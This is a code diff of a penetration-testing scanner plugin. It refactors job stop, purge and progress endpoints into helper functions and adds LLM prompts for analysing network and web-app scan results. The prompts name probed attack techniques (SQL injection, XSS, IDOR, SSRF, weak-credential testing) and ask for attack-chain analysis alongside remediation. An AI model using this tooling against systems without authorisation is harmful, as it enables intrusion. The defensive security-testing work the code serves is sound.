- - Parameters - ---------- - job_id : str - Identifier of the job to stop and delete. - - Returns - ------- - dict - Status of the purge operation including CID deletion counts. - """ - # Stop local workers if running - local_workers = self.scan_jobs.get(job_id) - if local_workers: - self.P(f"Stopping and deleting job {job_id}.") - for local_worker_id, job in local_workers.items(): - self.P(f"Stopping job {job_id} on local worker {local_worker_id}.") - job.stop() - self.P(f"Job {job_id} stopped.") - # Remove from active jobs - self.scan_jobs.pop(job_id, None) - - # Mark as stopped in CStore so purge_job accepts it - raw_job_specs = self.chainstore_hget(hkey=self.cfg_instance_id, key=job_id) - if isinstance(raw_job_specs, dict): - _, job_specs = self._normalize_job_record(job_id, raw_job_specs) - worker_entry = job_specs.setdefault("workers", {}).setdefault(self.ee_addr, {}) - worker_entry["finished"] = True - worker_entry["canceled"] = True - job_specs["job_status"] = JOB_STATUS_STOPPED - self._emit_timeline_event(job_specs, "stopped", "Job stopped and deleted", actor_type="user") - self.chainstore_hset(hkey=self.cfg_instance_id, key=job_id, value=job_specs) - else: - # Job not found in CStore — nothing to purge - self._log_audit_event("scan_stopped", {"job_id": job_id}) - return {"status": "success", "job_id": job_id, "cids_deleted": 0, "cids_total": 0} - - # Delegate full cleanup to purge_job - self._log_audit_event("scan_stopped", {"job_id": job_id}) - return self.purge_job(job_id) + """Stop a running job, then delegate to purge cleanup.""" + return stop_and_delete_job(self, job_id) @BasePlugin.endpoint def purge_job(self, job_id: str): - """ - Purge a job: delete all R1FS artifacts, clean up live progress keys, - then tombstone the CStore entry. - - Safety invariant: delete ALL R1FS artifacts first, THEN tombstone CStore. - If R1FS deletion fails partway, leave CStore intact so CIDs remain - discoverable for a retry. 
- - Parameters - ---------- - job_id : str - Identifier of the job to purge. - - Returns - ------- - dict - Status of the purge operation including CID deletion counts. - """ - raw = self.chainstore_hget(hkey=self.cfg_instance_id, key=job_id) - if not isinstance(raw, dict): - return {"status": "error", "message": f"Job {job_id} not found."} - - _, job_specs = self._normalize_job_record(job_id, raw) - - # Reject if job is still running - job_status = job_specs.get("job_status", "") - workers = job_specs.get("workers", {}) - if workers and any(not w.get("finished") for w in workers.values()): - return {"status": "error", "message": "Cannot purge a running job. Stop it first."} - if job_status not in (JOB_STATUS_FINALIZED, JOB_STATUS_STOPPED) and workers: - return {"status": "error", "message": "Cannot purge a running job. Stop it first."} - - # ── Collect all CIDs (deduplicated) ── - cids = set() - - def _track(cid, source): - """Add CID and log where it was found.""" - if cid and isinstance(cid, str) and cid not in cids: - cids.add(cid) - self.P(f"[PURGE] Collected CID {cid} from {source}") - - # Job config CID - _track(job_specs.get("job_config_cid"), "job_specs.job_config_cid") - - # Archive CID (finalized jobs) - job_cid = job_specs.get("job_cid") - if job_cid: - _track(job_cid, "job_specs.job_cid") - # Fetch archive to find nested CIDs - try: - archive = self.r1fs.get_json(job_cid) - if isinstance(archive, dict): - self.P(f"[PURGE] Archive fetched OK, {len(archive.get('passes', []))} passes") - for pi, pass_data in enumerate(archive.get("passes", [])): - _track(pass_data.get("aggregated_report_cid"), f"archive.passes[{pi}].aggregated_report_cid") - for addr, wr in (pass_data.get("worker_reports") or {}).items(): - if isinstance(wr, dict): - _track(wr.get("report_cid"), f"archive.passes[{pi}].worker_reports[{addr}].report_cid") - else: - self.P(f"[PURGE] Archive fetch returned non-dict: {type(archive)}", color='y') - except Exception as e: - self.P(f"[PURGE] 
Failed to fetch archive {job_cid}: {e}", color='r') - - # Worker report CIDs (running/stopped jobs — finalized stubs have no workers) - for addr, w in workers.items(): - _track(w.get("report_cid"), f"workers[{addr}].report_cid") - - # Pass report CIDs + nested CIDs (running/stopped jobs) - for ri, ref in enumerate(job_specs.get("pass_reports", [])): - report_cid = ref.get("report_cid") - if report_cid: - _track(report_cid, f"pass_reports[{ri}].report_cid") - try: - pass_data = self.r1fs.get_json(report_cid) - if isinstance(pass_data, dict): - _track(pass_data.get("aggregated_report_cid"), f"pass_reports[{ri}]->aggregated_report_cid") - for addr, wr in (pass_data.get("worker_reports") or {}).items(): - if isinstance(wr, dict): - _track(wr.get("report_cid"), f"pass_reports[{ri}]->worker_reports[{addr}].report_cid") - else: - self.P(f"[PURGE] Pass report fetch returned non-dict: {type(pass_data)}", color='y') - except Exception as e: - self.P(f"[PURGE] Failed to fetch pass report {report_cid}: {e}", color='r') - - self.P(f"[PURGE] Total CIDs collected: {len(cids)}: {sorted(cids)}") - - # ── Delete R1FS artifacts ── - deleted, failed = 0, 0 - for cid in cids: - try: - success = self.r1fs.delete_file(cid, show_logs=True, raise_on_error=False) - if success: - deleted += 1 - self.P(f"[PURGE] Deleted CID {cid}") - else: - failed += 1 - self.P(f"[PURGE] delete_file returned False for CID {cid}", color='r') - except Exception as e: - self.P(f"[PURGE] Failed to delete CID {cid}: {e}", color='r') - failed += 1 - - if failed > 0: - # Some CIDs couldn't be deleted — leave CStore intact for retry - self.P(f"Purge incomplete: {failed}/{len(cids)} CIDs failed. CStore kept.", color='r') - return { - "status": "partial", - "job_id": job_id, - "cids_deleted": deleted, - "cids_failed": failed, - "cids_total": len(cids), - "message": "Some R1FS artifacts could not be deleted. 
Retry purge later.", - } - - # ── Clean up live progress keys ── - all_live = self.chainstore_hgetall(hkey=f"{self.cfg_instance_id}:live") - if isinstance(all_live, dict): - prefix = f"{job_id}:" - for key in all_live: - if key.startswith(prefix): - self.chainstore_hset( - hkey=f"{self.cfg_instance_id}:live", key=key, value=None - ) - - # ── ALL R1FS artifacts deleted — safe to tombstone CStore ── - self.chainstore_hset(hkey=self.cfg_instance_id, key=job_id, value=None) - - self.P(f"Purged job {job_id}: {deleted}/{len(cids)} CIDs deleted.") - self._log_audit_event("job_purged", {"job_id": job_id, "cids_deleted": deleted, "cids_total": len(cids)}) - - return {"status": "success", "job_id": job_id, "cids_deleted": deleted, "cids_total": len(cids)} + """Purge a job after it reaches a stoppable terminal state.""" + return purge_job(self, job_id) @BasePlugin.endpoint @@ -3045,74 +2178,16 @@ def get_audit_log(self, limit: int = 100): dict Audit log entries and total count. """ - entries = self._audit_log[-limit:] if limit > 0 else self._audit_log + entries = list(self._audit_log) + if limit > 0: + entries = entries[-limit:] return {"audit_log": entries, "total": len(self._audit_log)} @BasePlugin.endpoint(method="post") def stop_monitoring(self, job_id: str, stop_type: str = "SOFT"): - """ - Stop a job (any run mode with HARD stop, continuous-only for SOFT stop). - - Parameters - ---------- - job_id : str - Identifier of the job to stop. - stop_type : str, optional - "SOFT" (default): Let current pass complete, then stop. - Sets job_status="SCHEDULED_FOR_STOP". Only valid for continuous monitoring. - "HARD": Stop immediately. Sets job_status="STOPPED". Works for any run mode. - - Returns - ------- - dict - Status including job_id and passes completed. 
- """ - raw_job_specs = self.chainstore_hget(hkey=self.cfg_instance_id, key=job_id) - if not raw_job_specs: - return {"error": "Job not found", "job_id": job_id} - - _, job_specs = self._normalize_job_record(job_id, raw_job_specs) - stop_type = str(stop_type).upper() - is_continuous = job_specs.get("run_mode") == RUN_MODE_CONTINUOUS_MONITORING - - if stop_type != "HARD" and not is_continuous: - return {"error": "SOFT stop is only supported for CONTINUOUS_MONITORING jobs", "job_id": job_id} - - passes_completed = job_specs.get("job_pass", 1) - - if stop_type == "HARD": - # Stop local workers if running - local_workers = self.scan_jobs.get(job_id) - if local_workers: - for local_worker_id, job in local_workers.items(): - self.P(f"Stopping job {job_id} on local worker {local_worker_id}.") - job.stop() - self.scan_jobs.pop(job_id, None) - - # Mark worker as finished/canceled in CStore - worker_entry = job_specs.setdefault("workers", {}).setdefault(self.ee_addr, {}) - worker_entry["finished"] = True - worker_entry["canceled"] = True - - job_specs["job_status"] = JOB_STATUS_STOPPED - self._emit_timeline_event(job_specs, "stopped", "Job stopped", actor_type="user") - self.P(f"Hard stop for job {job_id} after {passes_completed} passes") - else: - # SOFT stop - let current pass complete (continuous monitoring only) - job_specs["job_status"] = JOB_STATUS_SCHEDULED_FOR_STOP - self._emit_timeline_event(job_specs, "scheduled_for_stop", "Stop scheduled", actor_type="user") - self.P(f"[CONTINUOUS] Soft stop scheduled for job {job_id} (will stop after current pass)") - - self.chainstore_hset(hkey=self.cfg_instance_id, key=job_id, value=job_specs) - - return { - "job_status": job_specs["job_status"], - "stop_type": stop_type, - "job_id": job_id, - "passes_completed": passes_completed, - "pass_reports": job_specs.get("pass_reports", []), - } + """Stop a job immediately or schedule a soft stop for continuous scans.""" + return stop_monitoring(self, job_id, stop_type=stop_type) 
@BasePlugin.endpoint(method="post") @@ -3141,7 +2216,8 @@ def analyze_job( dict LLM analysis result or error message. """ - if not self.cfg_llm_agent_api_enabled: + llm_cfg = get_llm_agent_config(self) + if not llm_cfg["ENABLED"]: return {"error": "LLM Agent API is not enabled", "job_id": job_id} if not self.cfg_llm_agent_api_port: @@ -3172,7 +2248,7 @@ def analyze_job( job_config = self._get_job_config(job_specs) # Call LLM Agent API - analysis_type = analysis_type or self.cfg_llm_auto_analysis_type + analysis_type = analysis_type or llm_cfg["AUTO_ANALYSIS_TYPE"] # Add job metadata to report for context report_with_meta = dict(aggregated_report) @@ -3230,7 +2306,7 @@ def analyze_job( actor_type="user", meta={"report_cid": updated_cid, "pass_nr": latest_ref.get("pass_nr", current_pass)} ) - self.chainstore_hset(hkey=self.cfg_instance_id, key=job_id, value=job_specs) + PentesterApi01Plugin._write_job_record(self, job_id, job_specs, context="manual_llm_update") self.P(f"Manual LLM analysis saved for job {job_id}, updated pass report CID: {updated_cid}") except Exception as e: self.P(f"Failed to update pass report with analysis: {e}", color='y') @@ -3267,84 +2343,7 @@ def get_analysis(self, job_id: str = "", cid: str = "", pass_nr: int = None): dict LLM analysis data or error message. 
""" - # If CID provided directly, fetch it - if cid: - try: - analysis = self.r1fs.get_json(cid) - if analysis is None: - return {"error": "Analysis not found", "cid": cid} - return {"cid": cid, "analysis": analysis} - except Exception as e: - return {"error": str(e), "cid": cid} - - # Otherwise, look up by job_id - if not job_id: - return {"error": "Either job_id or cid must be provided"} - - job_specs = self._get_job_from_cstore(job_id) - if not job_specs: - return {"error": "Job not found", "job_id": job_id} - - # Look for analysis in pass_reports - pass_reports = job_specs.get("pass_reports", []) - job_status = job_specs.get("job_status", JOB_STATUS_RUNNING) - - if not pass_reports: - if job_status == JOB_STATUS_RUNNING: - return {"error": "Job still running, no passes completed yet", "job_id": job_id, "job_status": job_status} - return {"error": "No pass reports available for this job", "job_id": job_id, "job_status": job_status} - - # Find the requested pass (or latest if not specified) - target_pass = None - if pass_nr is not None: - for entry in pass_reports: - if entry.get("pass_nr") == pass_nr: - target_pass = entry - break - if not target_pass: - return {"error": f"Pass {pass_nr} not found in history", "job_id": job_id, "available_passes": [e.get("pass_nr") for e in pass_reports]} - else: - # Get the latest pass - target_pass = pass_reports[-1] - - # Fetch the PassReport from R1FS to get inline LLM analysis - report_cid = target_pass.get("report_cid") - if not report_cid: - return { - "error": "No pass report CID available for this pass", - "job_id": job_id, - "pass_nr": target_pass.get("pass_nr"), - "job_status": job_status - } - - try: - pass_data = self.r1fs.get_json(report_cid) - if pass_data is None: - return {"error": "Pass report not found in R1FS", "cid": report_cid, "job_id": job_id} - - llm_analysis = pass_data.get("llm_analysis") - if not llm_analysis: - return { - "error": "No LLM analysis available for this pass", - "job_id": job_id, - 
"pass_nr": target_pass.get("pass_nr"), - "llm_failed": pass_data.get("llm_failed", False), - "job_status": job_status - } - - return { - "job_id": job_id, - "pass_nr": target_pass.get("pass_nr"), - "completed_at": pass_data.get("date_completed"), - "report_cid": report_cid, - "target": job_specs.get("target"), - "num_workers": len(job_specs.get("workers", {})), - "total_passes": len(pass_reports), - "analysis": llm_analysis, - "quick_summary": pass_data.get("quick_summary"), - } - except Exception as e: - return {"error": str(e), "cid": report_cid, "job_id": job_id} + return get_job_analysis(self, job_id=job_id, cid=cid, pass_nr=pass_nr) @BasePlugin.endpoint @@ -3360,224 +2359,6 @@ def llm_health(self): return self._get_llm_health_status() - @staticmethod - def _merge_worker_metrics(metrics_list): - """Merge scan_metrics dicts from multiple local worker threads.""" - if not metrics_list: - return None - merged = {} - # Sum connection outcomes - outcomes = {} - for m in metrics_list: - for k, v in (m.get("connection_outcomes") or {}).items(): - outcomes[k] = outcomes.get(k, 0) + v - if outcomes: - merged["connection_outcomes"] = outcomes - # Sum coverage - cov_scanned = sum(m.get("coverage", {}).get("ports_scanned", 0) for m in metrics_list if m.get("coverage")) - cov_range = sum(m.get("coverage", {}).get("ports_in_range", 0) for m in metrics_list if m.get("coverage")) - cov_skipped = sum(m.get("coverage", {}).get("ports_skipped", 0) for m in metrics_list if m.get("coverage")) - cov_open = sum(m.get("coverage", {}).get("open_ports_count", 0) for m in metrics_list if m.get("coverage")) - if cov_range: - merged["coverage"] = { - "ports_in_range": cov_range, "ports_scanned": cov_scanned, - "ports_skipped": cov_skipped, - "coverage_pct": round(cov_scanned / cov_range * 100, 1), - "open_ports_count": cov_open, - } - # Sum finding distribution - findings = {} - for m in metrics_list: - for k, v in (m.get("finding_distribution") or {}).items(): - findings[k] = 
findings.get(k, 0) + v - if findings: - merged["finding_distribution"] = findings - # Sum service distribution - services = {} - for m in metrics_list: - for k, v in (m.get("service_distribution") or {}).items(): - services[k] = services.get(k, 0) + v - if services: - merged["service_distribution"] = services - # Sum probe counts - for field in ("probes_attempted", "probes_completed", "probes_skipped", "probes_failed"): - merged[field] = sum(m.get(field, 0) for m in metrics_list) - # Merge probe breakdown (union of all probes) - probe_bd = {} - for m in metrics_list: - for k, v in (m.get("probe_breakdown") or {}).items(): - # Keep worst status: failed > skipped > completed - existing = probe_bd.get(k) - if existing is None or v == "failed" or (v.startswith("skipped") and existing == "completed"): - probe_bd[k] = v - if probe_bd: - merged["probe_breakdown"] = probe_bd - # Total duration: max across threads/nodes (they run in parallel) - merged["total_duration"] = max(m.get("total_duration", 0) for m in metrics_list) - # Phase durations: max per phase (threads/nodes run in parallel, so wall-clock - # time for each phase is the max across all of them) - all_phases = {} - for m in metrics_list: - for phase, dur in (m.get("phase_durations") or {}).items(): - all_phases[phase] = max(all_phases.get(phase, 0), dur) - if all_phases: - merged["phase_durations"] = all_phases - longest = max(metrics_list, key=lambda m: m.get("total_duration", 0)) - # Merge stats distributions (response_times, port_scan_delays) - # Use weighted mean, global min/max, approximate p95/p99 from max of per-thread values - for stats_field in ("response_times", "port_scan_delays"): - stats_list = [m[stats_field] for m in metrics_list if m.get(stats_field)] - if stats_list: - total_count = sum(s.get("count", 0) for s in stats_list) - if total_count > 0: - merged[stats_field] = { - "min": min(s["min"] for s in stats_list), - "max": max(s["max"] for s in stats_list), - "mean": round(sum(s["mean"] * 
s.get("count", 1) for s in stats_list) / total_count, 4), - "median": round(sum(s["median"] * s.get("count", 1) for s in stats_list) / total_count, 4), - "stddev": round(max(s.get("stddev", 0) for s in stats_list), 4), - "p95": round(max(s.get("p95", 0) for s in stats_list), 4), - "p99": round(max(s.get("p99", 0) for s in stats_list), 4), - "count": total_count, - } - # Success rate over time: take from the longest-running thread - if longest.get("success_rate_over_time"): - merged["success_rate_over_time"] = longest["success_rate_over_time"] - # Detection flags (any thread detecting = True) - merged["rate_limiting_detected"] = any(m.get("rate_limiting_detected") for m in metrics_list) - merged["blocking_detected"] = any(m.get("blocking_detected") for m in metrics_list) - # Open port details: union, deduplicate by port - all_details = [] - seen_ports = set() - for m in metrics_list: - for d in (m.get("open_port_details") or []): - if d["port"] not in seen_ports: - seen_ports.add(d["port"]) - all_details.append(d) - if all_details: - merged["open_port_details"] = sorted(all_details, key=lambda x: x["port"]) - # Banner confirmation: sum counts - bc_confirmed = sum(m.get("banner_confirmation", {}).get("confirmed", 0) for m in metrics_list) - bc_guessed = sum(m.get("banner_confirmation", {}).get("guessed", 0) for m in metrics_list) - if bc_confirmed + bc_guessed > 0: - merged["banner_confirmation"] = {"confirmed": bc_confirmed, "guessed": bc_guessed} - return merged - - def _publish_live_progress(self): - """ - Publish live progress for all active local scan jobs. - - Builds per-thread progress data and writes a single WorkerProgress entry - per job to the `:live` CStore hset. Called periodically from process(). - - Progress is stage-based (stage_idx / 5 * 100) with port-scan sub-progress. - Phase is the earliest (least advanced) phase across all threads. - Per-thread data (phase, ports) is included when multiple threads are active. 
- """ - now = self.time() - if now - self._last_progress_publish < PROGRESS_PUBLISH_INTERVAL: - return - self._last_progress_publish = now - - live_hkey = f"{self.cfg_instance_id}:live" - ee_addr = self.ee_addr - - nr_phases = len(PHASE_ORDER) - - for job_id, local_workers in self.scan_jobs.items(): - if not local_workers: - continue - - # Build per-thread data - total_scanned = 0 - total_ports = 0 - all_open = set() - all_tests = set() - thread_entries = {} - thread_phases = [] - worker_metrics = [] - - for tid, worker in local_workers.items(): - state = worker.state - nr_ports = len(worker.initial_ports) - t_scanned = len(state.get("ports_scanned", [])) - t_open = sorted(state.get("open_ports", [])) - t_phase = _thread_phase(state) - - total_scanned += t_scanned - total_ports += nr_ports - all_open.update(t_open) - all_tests.update(state.get("completed_tests", [])) - worker_metrics.append(worker.metrics.build().to_dict()) - thread_phases.append(t_phase) - - thread_entries[tid] = { - "phase": t_phase, - "ports_scanned": t_scanned, - "ports_total": nr_ports, - "open_ports_found": t_open, - } - - # Overall phase: earliest (least advanced) across threads - phase_indices = [PHASE_ORDER.index(p) if p in PHASE_ORDER else nr_phases for p in thread_phases] - min_phase_idx = min(phase_indices) if phase_indices else 0 - phase = PHASE_ORDER[min_phase_idx] if min_phase_idx < nr_phases else "done" - - # Stage-based progress: completed_stages / total * 100 - # During port_scan, add sub-progress based on ports scanned - stage_progress = (min_phase_idx / nr_phases) * 100 - if phase == "port_scan" and total_ports > 0: - stage_progress += (total_scanned / total_ports) * (100 / nr_phases) - progress_pct = round(min(stage_progress, 100), 1) - - # Look up pass number from CStore - job_specs = self.chainstore_hget(hkey=self.cfg_instance_id, key=job_id) - pass_nr = 1 - if isinstance(job_specs, dict): - pass_nr = job_specs.get("job_pass", 1) - - # Merge metrics from all local threads - 
merged_metrics = worker_metrics[0] if len(worker_metrics) == 1 else self._merge_worker_metrics(worker_metrics) - - progress = WorkerProgress( - job_id=job_id, - worker_addr=ee_addr, - pass_nr=pass_nr, - progress=progress_pct, - phase=phase, - ports_scanned=total_scanned, - ports_total=total_ports, - open_ports_found=sorted(all_open), - completed_tests=sorted(all_tests), - updated_at=now, - live_metrics=merged_metrics, - threads=thread_entries if len(thread_entries) > 1 else None, - ) - self.chainstore_hset( - hkey=live_hkey, - key=f"{job_id}:{ee_addr}", - value=progress.to_dict(), - ) - - def _clear_live_progress(self, job_id, worker_addresses): - """ - Remove live progress keys for a completed job. - - Parameters - ---------- - job_id : str - Job identifier. - worker_addresses : list[str] - Worker addresses whose progress keys should be removed. - """ - live_hkey = f"{self.cfg_instance_id}:live" - for addr in worker_addresses: - self.chainstore_hset( - hkey=live_hkey, - key=f"{job_id}:{addr}", - value=None, # delete - ) - def process(self): """ Periodic task handler: launch new jobs and close completed ones. 
@@ -3592,7 +2373,7 @@ def process(self): if self._semaphore_get_keys() and not self.is_plugin_ready(): self.semaphore_start_wait() if self.semaphore_check_with_logging(): - if self.cfg_llm_agent_api_enabled: + if get_llm_agent_config(self)["ENABLED"]: self._maybe_resolve_llm_agent_from_semaphore() self.set_plugin_ready(True) @@ -3606,6 +2387,8 @@ def process(self): self._maybe_launch_jobs() # Publish live progress for active scans self._publish_live_progress() + # Launcher-side retry path for missed worker announcements + self._maybe_reannounce_worker_assignments() # Stop local workers for jobs that were stopped via API (multi-node propagation) self._maybe_stop_canceled_jobs() # Check active jobs for completion diff --git a/extensions/business/cybersec/red_mesh/redmesh_llm_agent_api.py b/extensions/business/cybersec/red_mesh/redmesh_llm_agent_api.py index 92ff3d3f..02d4af1f 100644 --- a/extensions/business/cybersec/red_mesh/redmesh_llm_agent_api.py +++ b/extensions/business/cybersec/red_mesh/redmesh_llm_agent_api.py @@ -92,44 +92,141 @@ }, } -# System prompts for scan analysis -ANALYSIS_PROMPTS = { - LLM_ANALYSIS_SECURITY_ASSESSMENT: """You are a cybersecurity expert analyzing network scan results. -Provide a comprehensive security assessment of the target based on the scan data. -Include: -1. Executive summary of security posture -2. Key findings organized by severity (Critical, High, Medium, Low) -3. Attack surface analysis -4. Overall risk rating - -Be specific and reference the actual findings from the scan data.""", - - LLM_ANALYSIS_VULNERABILITY_SUMMARY: """You are a cybersecurity expert analyzing network scan results. -Provide a prioritized vulnerability summary based on the scan data. -Include: -1. Vulnerabilities ranked by severity and exploitability -2. CVE references where applicable -3. Potential impact of each vulnerability -4. 
Quick wins (easy fixes with high impact) - -Focus on actionable findings.""", - - LLM_ANALYSIS_REMEDIATION_PLAN: """You are a cybersecurity expert analyzing network scan results. -Provide a detailed remediation plan based on the scan data. -Include: -1. Prioritized remediation steps -2. Specific commands or configurations to fix issues -3. Estimated effort for each fix -4. Dependencies between fixes -5. Verification steps to confirm remediation - -Be practical and provide copy-paste ready solutions where possible.""", - - LLM_ANALYSIS_QUICK_SUMMARY: """You are a cybersecurity expert. Based on the scan results below, write a quick executive summary in exactly 2-4 sentences. Cover: how many ports/services were found, the overall risk posture (critical/high/medium/low), and the single most important finding or action item. Be specific but extremely concise -- this is a dashboard glance summary, not a full report.""", +# System prompts for scan analysis — network (blackbox port scanning) +_NETWORK_PROMPTS = { + LLM_ANALYSIS_SECURITY_ASSESSMENT: """You are a senior penetration tester analyzing blackbox network scan results. The scan probed TCP ports on the target, fingerprinted services, tested for known CVEs, checked default credentials, and ran protocol-specific probes (HTTP, SSH, TLS, DNS, SMTP, databases, ICS/SCADA). + +Provide a comprehensive security assessment. Structure your response as: + +1. **Executive Summary** — One paragraph: overall security posture, number of open ports, number and severity distribution of findings, and whether the target is internet-facing or internal. +2. **Critical & High Findings** — For each finding: what was found, why it matters (business impact, not just technical), exploitability (is a public exploit available? is it authenticated or unauthenticated?), and the specific evidence from scan data (port, service, banner, CVE ID). +3. **Attack Surface Analysis** — Map the exposed services to potential attack chains. 
Identify lateral movement opportunities (e.g., exposed database + weak credentials → data exfiltration). Note any ICS/SCADA indicators. +4. **Medium & Low Findings** — Briefly list with one-line impact statements. +5. **Risk Rating** — Rate as Critical/High/Medium/Low with a one-sentence justification. Factor in: number of critical findings, presence of default credentials, unpatched CVEs with public exploits, and exposed management interfaces. + +Reference specific ports, services, CVE IDs, and banners from the scan data. Do not make generic recommendations — be specific to what was actually found.""", + + LLM_ANALYSIS_VULNERABILITY_SUMMARY: """You are a senior penetration tester analyzing blackbox network scan results. The scan probed TCP ports, fingerprinted services, and tested for known CVEs and misconfigurations. + +Provide a prioritized vulnerability summary. Structure your response as: + +1. **Findings by Severity** — Group findings into Critical, High, Medium, Low. For each: + - One-line title (e.g., "OpenSSH 7.4 — CVE-2023-38408 (RCE)") + - Port/service where found + - CVSS score or exploitability assessment (unauthenticated RCE > authenticated info disclosure) + - Real-world impact (data breach, lateral movement, denial of service) +2. **Quick Wins** — Top 3-5 fixes with highest security impact and lowest effort (e.g., disable SSLv3, change default password, restrict management port to VPN). +3. **CVE Cross-Reference** — Table of all CVEs found with affected service, version, and whether a public exploit exists. + +Rank findings by exploitability first, then severity. An unauthenticated RCE on a public-facing service is always the top priority, regardless of CVSS score.""", + + LLM_ANALYSIS_REMEDIATION_PLAN: """You are a senior penetration tester creating a remediation plan from blackbox network scan results. The scan probed TCP ports, fingerprinted services, and tested for CVEs and misconfigurations. 
+ +Provide a remediation plan that a system administrator can execute. Structure your response as: + +1. **Immediate Actions (24-48 hours)** — Critical and easily exploitable findings. For each: + - What to fix and where (specific port, service, config file) + - Exact command or configuration change (copy-paste ready) + - Verification step to confirm the fix worked +2. **Short-Term (1-2 weeks)** — High findings, patch deployments, credential rotations. +3. **Medium-Term (1-3 months)** — Architecture improvements, network segmentation, hardening. +4. **Dependencies** — Note where one fix must happen before another (e.g., "patch OpenSSH before rotating SSH keys"). +5. **Compensating Controls** — If a fix requires downtime or coordination, suggest interim mitigations (e.g., firewall rule to restrict access while waiting for patch window). + +Be specific to the services and versions found. Do not suggest generic hardening guides — reference the actual findings.""", + + LLM_ANALYSIS_QUICK_SUMMARY: """You are a senior penetration tester. Based on the network scan results below, write an executive summary in exactly 2-4 sentences. + +Cover: number of open ports, number of services identified, overall risk posture (Critical/High/Medium/Low), and the single most important finding or action item. Mention specific CVEs or service names if critical findings exist. This is a dashboard glance summary — be specific but extremely concise.""", +} + + +# System prompts for scan analysis — webapp (authenticated graybox testing) +_WEBAPP_PROMPTS = { + LLM_ANALYSIS_SECURITY_ASSESSMENT: """You are a senior web application security specialist analyzing authenticated graybox scan results. 
The scan authenticated to the target web application with admin and optionally regular-user credentials, discovered routes and forms via crawling, and ran OWASP Top 10 probes including: + +- **A01 (Broken Access Control)**: IDOR/BOLA testing, privilege escalation from regular to admin endpoints +- **A02 (Security Misconfiguration)**: Debug endpoint exposure, CORS policy, security headers, cookie attributes, CSRF protection, session token quality (JWT alg=none, short tokens) +- **A03 (Injection)**: Reflected XSS and SQL injection in login and authenticated forms, stored XSS via form submission and readback +- **A05 (Broken Access Control)**: Login form injection testing +- **A06 (Insecure Design)**: Workflow bypass testing on state-changing endpoints +- **A07 (Identification & Auth Failures)**: Bounded weak credential testing with lockout detection +- **API7 (SSRF)**: Server-side request forgery on URL-fetch endpoints + +Each finding has a status (vulnerable / not_vulnerable / inconclusive), severity, OWASP category, CWE IDs, evidence, and replay steps. + +Provide a comprehensive security assessment. Structure your response as: + +1. **Executive Summary** — One paragraph: overall application security posture, how many scenarios were tested, how many are vulnerable, and the OWASP categories with the most findings. Note the authentication context (which user roles were tested). +2. **Critical & High Findings** — For each vulnerable finding: + - Scenario ID and title + - Business impact (e.g., "Unauthorized access to other users' records", "Session hijacking via XSS", "Admin functionality accessible to regular users") + - Exploitability: Is it trivially reproducible? Does it require authentication? Can it be chained with other findings? + - Evidence from the scan (endpoint, payload, response) + - Replay steps (from the scan data) so the development team can reproduce +3. **OWASP Coverage Analysis** — Which OWASP categories were tested and what the outcomes were. 
Flag any categories that were skipped (probes disabled, missing configuration, no forms discovered) — these represent blind spots. +4. **Attack Chain Analysis** — Identify how individual findings could be chained (e.g., XSS + missing CSRF → account takeover, IDOR + weak auth → mass data exfiltration). +5. **Medium & Low Findings** — Missing security headers, cookie attribute issues, inconclusive results that warrant manual verification. +6. **Risk Rating** — Rate as Critical/High/Medium/Low. A single IDOR or privilege escalation finding on a production app with real user data makes this Critical regardless of other findings. + +Reference specific scenario IDs, endpoints, and evidence from the scan data. For inconclusive findings, explain what manual testing would confirm or rule out the issue.""", + + LLM_ANALYSIS_VULNERABILITY_SUMMARY: """You are a senior web application security specialist analyzing authenticated graybox scan results. The scan tested OWASP Top 10 categories (A01-A07, API7) against the target application using admin and regular-user sessions. + +Each finding has: scenario_id, status (vulnerable/not_vulnerable/inconclusive), severity, OWASP category, CWE IDs, evidence, and replay steps. + +Provide a prioritized vulnerability summary. Structure your response as: + +1. **Vulnerable Findings by Severity** — Group by Critical, High, Medium, Low. For each: + - Scenario ID and title + - OWASP category and CWE + - One-line business impact + - Whether the finding is confirmed (status=vulnerable) or needs manual verification (status=inconclusive) +2. **Quick Wins** — Top 3-5 fixes with highest security impact and lowest development effort. Examples: add CSRF tokens, set HttpOnly/Secure on cookies, add Content-Security-Policy header, fix CORS wildcard. +3. 
**Inconclusive Findings Requiring Manual Review** — List findings with status=inconclusive and explain what additional testing would confirm them (e.g., "JWT signature weakness detected — manually verify if the signing key is brute-forceable"). +4. **Untested Areas** — Probes that were skipped (stateful probes disabled, no SSRF endpoints configured, no forms discovered). These are coverage gaps the team should address manually. + +Rank confirmed vulnerabilities above inconclusive ones. Rank by business impact: access control failures > injection > misconfigurations.""", + + LLM_ANALYSIS_REMEDIATION_PLAN: """You are a senior web application security specialist creating a remediation plan from authenticated graybox scan results. The scan tested OWASP Top 10 categories against the target application. + +Each finding includes: scenario_id, OWASP category, CWE IDs, evidence, and replay steps for reproduction. + +Provide a remediation plan for the development team. Structure your response as: + +1. **Immediate Actions (next sprint)** — Critical and High findings. For each: + - What to fix, referencing the specific endpoint and CWE + - Code-level fix guidance (e.g., "Add @login_required + object ownership check on /api/records/{id}/", "Escape output with django.utils.html.escape()", "Set SameSite=Strict on session cookie") + - Framework-specific guidance where possible (Django, Flask, Rails, Express patterns) + - Verification: how to confirm the fix using the replay steps from the scan +2. **Short-Term (1-2 sprints)** — Medium findings, security header additions, cookie hardening. +3. 
**Architecture Improvements** — Systemic fixes that prevent entire vulnerability classes: + - CSRF: framework-level middleware enforcement (not per-endpoint) + - Access control: centralized authorization middleware (not per-view checks) + - Injection: parameterized queries + output encoding at the template layer + - Security headers: middleware/reverse-proxy level (one config change covers all endpoints) +4. **Testing Improvements** — Suggest integration tests the team should add to prevent regressions (e.g., "Add test that regular user gets 403 on /api/admin/export-users/"). + +Reference the specific scenario IDs and endpoints from the scan. Provide copy-paste code snippets where possible.""", + + LLM_ANALYSIS_QUICK_SUMMARY: """You are a senior web application security specialist. Based on the authenticated graybox scan results below, write an executive summary in exactly 2-4 sentences. + +Cover: how many OWASP scenarios were tested, how many are vulnerable, the highest-severity finding (mention the specific vulnerability type — e.g., IDOR, XSS, CSRF bypass), and the single most important action item for the development team. This is a dashboard glance summary — be specific but extremely concise.""", } -class RedmeshLlmAgentApiPlugin(BasePlugin): +def _get_analysis_prompts(scan_type: str) -> dict: + """Select prompt set based on scan type.""" + if scan_type == "webapp": + return _WEBAPP_PROMPTS + return _NETWORK_PROMPTS + + +# Default prompts (network) for backward compatibility +ANALYSIS_PROMPTS = _NETWORK_PROMPTS + + +class RedMeshLlmAgentApiPlugin(BasePlugin): """ RedMesh LLM Agent API plugin for DeepSeek integration. 
